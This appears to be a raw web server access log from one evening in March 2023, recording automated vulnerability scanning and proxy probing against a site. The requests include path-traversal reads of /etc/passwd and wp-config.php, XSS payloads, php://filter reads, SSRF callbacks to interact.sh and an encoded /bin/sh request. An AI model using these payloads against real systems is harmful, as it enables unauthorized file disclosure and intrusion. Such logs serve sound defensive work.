90.151.171.106 - - [08/Mar/2023:20:16:48 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:20:16:48 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [08/Mar/2023:20:16:53 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:20:16:53 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:20:16:53 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:20:17:49 +0530] "GET /wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1082
72.44.65.82 - - [08/Mar/2023:20:18:03 +0530] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:20:18:04 +0530] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:20:19:53 +0530] "GET /process/feries.php?fichier=../../../../../../../etc/passwd HTTP/1.1" 404 1030
154.89.5.100 - - [08/Mar/2023:20:24:53 +0530] "GET / HTTP/1.1" 200 11250
177.54.82.150 - - [08/Mar/2023:20:28:54 +0530] "GET / HTTP/1.1" 200 11250
177.72.92.190 - - [08/Mar/2023:20:30:33 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:20:30:51 +0530] "GET /webapi/v1/system/accountmanage/account HTTP/1.1" 404 1070
72.44.65.82 - - [08/Mar/2023:20:32:29 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:20:39:28 +0530] "GET /IntellectMain.jsp?IntellectSystem=https://www.interact.sh HTTP/1.1" 404 1028
90.151.171.106 - - [08/Mar/2023:20:43:40 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:20:43:40 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:20:43:40 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:20:43:40 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:20:43:40 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:20:43:45 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:20:43:45 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:20:43:45 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:20:45:39 +0530] "GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1076
72.44.65.82 - - [08/Mar/2023:20:49:50 +0530] "GET /gallery/zp-core/setup/index.php HTTP/1.1" 404 1056
72.44.65.82 - - [08/Mar/2023:20:49:51 +0530] "GET /zenphoto/zp-core/setup/index.php HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:20:55:16 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchacategoriestree HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:20:56:37 +0530] "GET /remote/login?err=--%3E%3Cscript%3Ealert('2Mgie9Uqr7UDN5uTZyhhFQKpZAR')%3C/script%3E%3C!--&lang=en HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:20:57:48 +0530] "POST /config/pw_snmp_done.html HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:20:59:32 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:20:59:32 +0530] "GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E&items%5BITEMS%5D%5BTOGGLABLE%5D=test123 HTTP/1.1" 404 1092
72.44.65.82 - - [08/Mar/2023:21:00:22 +0530] "GET /Images/Remote?imageUrl=http://interact.sh/ HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:21:02:26 +0530] "GET /install/ HTTP/1.1" 404 1010
175.107.1.52 - - [08/Mar/2023:21:05:42 +0530] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1040
72.44.65.82 - - [08/Mar/2023:21:06:07 +0530] "GET /manage/webshell/u?_=5621298674064&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&s=5&w=218 HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:21:06:58 +0530] "GET /card_scan.php?CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&No=0000&ReaderNo=0000 HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:21:07:12 +0530] "POST /hms/user-login.php HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:21:07:55 +0530] "GET /2MgieDlNY4bw0zmoLTTIxv6YqPf.txt HTTP/1.1" 404 1056
154.89.5.213 - - [08/Mar/2023:21:12:28 +0530] "GET / HTTP/1.1" 200 11250
45.128.232.112 - - [08/Mar/2023:21:13:47 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:21:15:11 +0530] "GET /zenphoto/zp-core/setup/index.php HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:21:15:21 +0530] "GET /gallery/zp-core/setup/index.php HTTP/1.1" 404 1056
72.44.65.82 - - [08/Mar/2023:21:16:12 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:21:21:09 +0530] "GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:21:23:22 +0530] "GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1 HTTP/1.1" 404 1028
90.151.171.106 - - [08/Mar/2023:21:27:07 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:21:27:07 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:21:27:07 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:21:27:07 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:21:27:08 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:21:27:08 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:21:27:12 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:21:27:12 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:21:28:48 +0530] "GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1082
72.44.65.82 - - [08/Mar/2023:21:29:05 +0530] "GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:21:34:22 +0530] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 1090
72.44.65.82 - - [08/Mar/2023:21:37:28 +0530] "GET /monitoring/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
45.128.232.112 - - [08/Mar/2023:21:37:37 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:21:40:26 +0530] "GET /plugins/weathermap/editor.php?action=set_map_properties&debug=existing&link_bandwidth_in&link_bandwidth_out&link_hover&link_infourl&link_name&link_target&link_width&map_legend=Traffic+Load&map_linkdefaultwidth=7&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&mapname=poc.conf&node_hover&node_iconfilename=--NONE--&node_infourl&node_label&node_name&node_new_name&node_x&node_y&param&param2&plug=0 HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:21:40:34 +0530] "GET /plugins/weathermap/configs/poc.conf HTTP/1.1" 404 1064
45.128.232.112 - - [08/Mar/2023:21:42:13 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:21:43:04 +0530] "GET /settings.php.old HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:21:43:04 +0530] "GET /settings.php.save HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:21:43:05 +0530] "GET /settings.php.swp HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:21:43:06 +0530] "GET /settings.php.txt HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:21:48:53 +0530] "GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:21:49:44 +0530] "GET /libs/granite/security/content/useradmin.html HTTP/1.1" 404 1082
72.44.65.82 - - [08/Mar/2023:21:50:32 +0530] "GET /install/?step=1 HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:21:51:54 +0530] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:21:52:40 +0530] "POST /api/user/reg HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:21:52:40 +0530] "GET /api/group/list HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:21:54:01 +0530] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1" 404 1126
72.44.65.82 - - [08/Mar/2023:21:55:31 +0530] "GET /wan.htm HTTP/1.1" 404 1008
128.14.209.226 - - [08/Mar/2023:22:03:17 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:22:05:18 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 1102
72.44.65.82 - - [08/Mar/2023:22:05:28 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 1102
90.151.171.106 - - [08/Mar/2023:22:15:51 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:22:15:51 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:22:15:51 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:22:15:51 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:22:15:51 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [08/Mar/2023:22:15:56 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:22:15:56 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:22:15:56 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:22:22:00 +0530] "POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1" 404 1064
72.44.65.82 - - [08/Mar/2023:22:22:48 +0530] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:22:22:56 +0530] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:22:31:42 +0530] "GET /../../../../../../../../../../../etc/passwd%23foo/development HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:22:31:51 +0530] "GET /sensorlist.htm HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:22:33:28 +0530] "GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:22:45:00 +0530] "POST /cgi-bin/rpc HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:22:45:10 +0530] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 404 1068
72.44.65.82 - - [08/Mar/2023:22:47:50 +0530] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1124
72.44.65.82 - - [08/Mar/2023:22:47:53 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:22:48:04 +0530] "GET /cgi-bin/stats HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:22:48:25 +0530] "GET /test.cgi HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:22:48:38 +0530] "GET /cgi-bin/test-cgi HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:22:50:12 +0530] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:22:50:52 +0530] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1086
72.44.65.82 - - [08/Mar/2023:22:51:00 +0530] "GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1102
72.44.65.82 - - [08/Mar/2023:22:52:28 +0530] "POST /webadmin/auth/verification.php HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:22:54:02 +0530] "GET /lfm.php HTTP/1.1" 404 1008
72.44.65.82 - - [08/Mar/2023:22:57:16 +0530] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1074
72.44.65.82 - - [08/Mar/2023:22:58:01 +0530] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 1054
90.151.171.108 - - [08/Mar/2023:22:59:06 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:22:59:06 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:22:59:06 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:22:59:06 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:22:59:11 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [08/Mar/2023:22:59:11 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [08/Mar/2023:22:59:11 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:22:59:11 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:23:01:44 +0530] "GET /login.php HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:23:10:29 +0530] "POST /hms/admin/ HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:23:14:39 +0530] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1076
72.44.65.82 - - [08/Mar/2023:23:20:45 +0530] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 403 1004
72.44.65.82 - - [08/Mar/2023:23:24:25 +0530] "POST /api/graphql HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:23:24:41 +0530] "GET /Admin/frmWelcome.aspx HTTP/1.1" 404 1036
72.44.65.82 - - [08/Mar/2023:23:24:44 +0530] "GET /select_project.php?url=http://interact.sh HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:23:30:43 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:23:37:47 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
5.187.42.59 - - [08/Mar/2023:23:40:26 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:23:42:21 +0530] "GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1026
72.44.65.82 - - [08/Mar/2023:23:46:59 +0530] "POST /carbon/admin/login_action.jsp HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:23:47:57 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:23:50:26 +0530] "GET /jbpm-console/app/tasks.jsf HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:23:50:38 +0530] "POST /jbpm-console/app/j_security_check HTTP/1.1" 404 1060
72.44.65.82 - - [08/Mar/2023:23:50:42 +0530] "GET /audit/gui_detail_view.php?id=%5C&login=admin&token=1&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23 HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:23:51:20 +0530] "GET /jbpm-console/app/tasks.jsf HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:23:51:44 +0530] "GET /login.do?message=9999*5555 HTTP/1.1" 404 1010
46.174.191.30 - - [08/Mar/2023:23:53:51 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:23:54:20 +0530] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 1060
90.151.171.106 - - [08/Mar/2023:23:55:49 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:23:55:49 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:23:55:55 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:23:55:55 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:23:56:00 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:23:56:00 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:23:56:05 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:23:56:05 +0530] "-" 400 -